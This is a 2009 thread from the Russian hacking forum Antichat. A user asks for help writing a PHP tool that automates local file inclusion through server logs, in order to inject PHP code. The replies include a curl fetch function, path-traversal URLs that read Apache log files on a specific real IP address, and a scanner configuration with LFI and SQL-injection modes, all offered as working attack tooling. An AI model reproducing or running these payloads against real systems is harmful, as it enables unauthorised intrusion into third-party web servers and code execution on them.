Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
Помогите написать автоинклудер на PHP |
06.07.2009, 00:33
|
|
Banned
Регистрация: 23.06.2009
Сообщений: 89
Провел на форуме:
347165
Репутация:
-67
|
|
Помогите написать автоинклудер на PHP
Всем привет. Может кто сталкивался с php инклудом, тем нужны были логи, чтобы ззабить туда пхп код и заинлудеть. Но мне в падлу переьеоать в ручную пути к логам. Вот я хочу написать сам скрипт на пхп. Я знаю токо основы пхп и прошу вашей помощи.
Помогите составить алгоритм. и я буду оч. признателен если кто напишет простенький каркас(основу) инлкдера.
ЗЫ готовый не предлагать. я юзал инлудер от Pashkela. Но он жопный. Плохо, медленно, и некаректно работает . и др. не лучше.
///
УДАЛИТЕ ТЕМУ УМАЛЯЮ
Последний раз редактировалось nub-hacker; 08.07.2009 в 12:22..
|
|
|
06.07.2009, 00:39
|
|
Постоянный
Регистрация: 12.12.2006
Сообщений: 906
Провел на форуме:
4205500
Репутация:
930
|
|
Как каркас можно использовать уже написанные. Благо их довольно много.
Мм и да, инклуд можно осуществить не только через логи )
Последний раз редактировалось Fata1ex; 06.07.2009 в 00:41..
|
|
|
|
06.07.2009, 00:44
|
|
Познавший АНТИЧАТ
Регистрация: 09.06.2006
Сообщений: 1,359
Провел на форуме:
5301021
Репутация:
1879
|
|
_https://forum.antichat.ru/showpost.php?p=467814&postcount=2
Хм... архив у Электа битый... нашел тут:
_http://forum.blackhack.ru/showthread.php?t=2644
Последний раз редактировалось Ch3ck; 06.07.2009 в 00:48..
|
|
|
|
06.07.2009, 00:53
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
мой круче  )) Просто у ТС руки не из того места растут |
|
|
|
08.07.2009, 12:20
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076
Репутация:
4303
|
|
https://forum.antichat.ru/thread127462.html
ппц
|
|
|
|
08.07.2009, 12:57
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
Если камушек в мой огород, то просто добавляем функцию получения информации через курлы:
PHP код:
function get($url)
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL,$url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.0.1) Gecko/2008070208');
$ss=curl_exec($ch);
curl_close($ch);
return $ss;
}
и везде в коде scan меняем на get, и всё пашет, вот доказательства:
Код:
http://137.207.248.30/60-270/php/viewsource.php?fname=../../../../../../../var/log/apache2/access_log
http://137.207.248.30/60-270/php/viewsource.php?fname=../../../../../../../var/log/apache2/error_log
просто через fsockopen не всегда почему-то дает парсить
phpinj.ini для конкретно данного случая:
Код:
;=========================================
MODE = 1 ; <= режим сканирования
;MODE = 1 - имеется LFI, при неправильном запросе ВИДЕН текст ошибки
;MODE = 2 - имеется LFI, при неправильном запросе НЕ ВИДЕН текст ошибки (ниже требуется ввести URL, вызывающий ошибку)
;MODE = 3 - имеется SQL-INJ + file_priv=Y + magic_quotes=OFF, при неправильном запросе ВИДЕН текст ошибки
;MODE = 4 - имеется SQL-INJ + file_priv=Y + magic_quotes=OFF, при неправильном запросе НЕ ВИДЕН текст ошибки (ниже требуется ввести URL, вызывающий ошибку)
;MODE = 5 - имеется SQL-INJ + file_priv=Y + magic_quotes=ON, при неправильном запросе ВИДЕН текст ошибки
;MODE = 6 - имеется SQL-INJ + file_priv=Y + magic_quotes=ON, при неправильном запросе НЕ ВИДЕН текст ошибки (ниже требуется ввести URL, вызывающий ошибку)
;=========================================
; url-для сканирования (начало)
;----------------------------------------------------------------------------------------------------
URL = "http://137.207.248.30/60-270/php/viewsource.php?fname=../../../../../../../"
;----------------------------------------------------------------------------------------------------
; url, которая вызывает ошибку
;----------------------------------------------------------------------------------------------------
ERROR_URL = ""
;----------------------------------------------------------------------------------------------------
; окончание url-для сканирования
;----------------------------------------------------------------------------------------------------
URL_END = ""
;----------------------------------------------------------------------------------------------------
; Текст ошибки, при вызове ошибочной страницы, четко показывающая, что искомый параметр не найден (если ошибки видны)
;----------------------------------------------------------------------------------------------------
ERROR_MESSAGE = Error
;----------------------------------------------------------------------------------------------------
PAUSE = 0 ; Пауза между запросами
Но с курлами будет работать только .php, .exe пахать не будет
Последний раз редактировалось Pashkela; 08.07.2009 в 13:02..
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
